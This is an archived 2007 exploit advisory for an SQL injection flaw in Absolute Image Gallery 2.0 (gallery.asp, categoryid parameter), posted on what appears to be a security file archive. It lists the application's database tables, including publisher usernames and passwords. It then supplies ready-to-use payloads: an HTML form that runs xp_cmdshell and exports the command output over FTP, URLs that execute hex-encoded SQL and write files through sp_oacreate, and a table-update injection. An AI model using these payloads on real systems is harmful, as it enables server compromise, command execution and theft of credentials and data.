aig-mssql.txt

aig-mssql.txt: Posted Mar 20, 2007; Authored by UniquE-Key; Absolute Image Gallery version 2.0 MS-SQL injection exploit that makes use of Gallery.ASP.; tags | exploit, sql injection, asp; SHA-256 | 62d7867fa4ae9e2a2a11e51ff1a122eeb590a2cdcb17369601dcc12df79dfe31; Download | Favorite | View

aig-mssql.txt

Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-15}

Product / Vendor :

Absolute Image Gallery

http://www.xigla.com/absoluteig/

Bug :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-

---------------------------------------------------------------------------------------------------------------------------------------------

Script Table/Colon Name : 

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articlefiles

fileid
filetitle
filename
articleid
filetype
filecomment
urlfile

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : articles

articleid
posted
lastupdate
headline
headlinedate
startdate
enddate
source
summary
articleurl
article
status
autoformat
publisherid
clicks
editor
relatedid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : iArticlesZones

articleid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : plugins

pluginid
pplname
pplfile
ppldescription

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : PPL1reviews

reviewid
articleid
name
reviewdate
review
comments
isannonymous

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publishers

publisherid
name
username
password
email
additional
plevel

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : publisherszones

publisherid
zoneid

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGcategories

categoryid
catname
catdesc
supercatid
lastupdate
catpath
images
allowupload

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGimages

imageid
imagename
imagedesc
imagefile
imagedate
imagesize
totalrating
totalreviews
hits
categoryid
status
uploadedby
additionalinfo
embedhtml
keywords
copyright
credit
source
datecreated
email
infourl

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : xlaAIGpostcards

dateposted
postcardid
imageid
bgcolor
bordercolor
fonttype
fontcolor
recipientname
recipientemail
greeting
bgsound
sendername
senderemail
sendermsg

---------------------------------------------------------------------------------------------------------------------------------------------

Table Name : zones

zonename
description
template
articlespz
zonefont
fontsize
fontcolor
showsource
showsummary
showdates
showtn
textalign
displayhoriz
cellcolor
targetframe

---------------------------------------------------------------------------------------------------------------------------------------------

MSSQL CMD Injection Exploit(For DBO Users) :

<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>
<body bgcolor="#000000">
<form name="Form" method="get" action="http://localhost/script/gallery.asp">
<center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>
<center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center>
<center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center>
  <tr>
    <center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
    <center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
    <td>&nbsp;</td>
    <td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
    <td>&nbsp;</td>
    <td>
      <select name="">
        <option value="0">(CMD)</option>
      </select>&nbsp;<br><br>
      <input type="submit" value="Apply"></center>
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

---------------------------------------------------------------------------------------------------------------------------------------------

Code Injection(For DBO Users) :

Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--

ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--

Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--

---------------------------------------------------------------------------------------------------------------------------------------------

UPDATE(ALL users) :

http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--

---------------------------------------------------------------------------------------------------------------------------------------------

Tested :

Absolute Image Gallery 2.0

Vulnerable :

Absolute Image Gallery 2.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

Top Authors In Last 30 Days

Red Hat 277 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 66 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Debian 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,107)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,764)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,813)
UNIX (9,453)
UnixWare (188)
Windows (6,765)
Other

aig-mssql.txt

aig-mssql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

aig-mssql.txt

Share This

aig-mssql.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems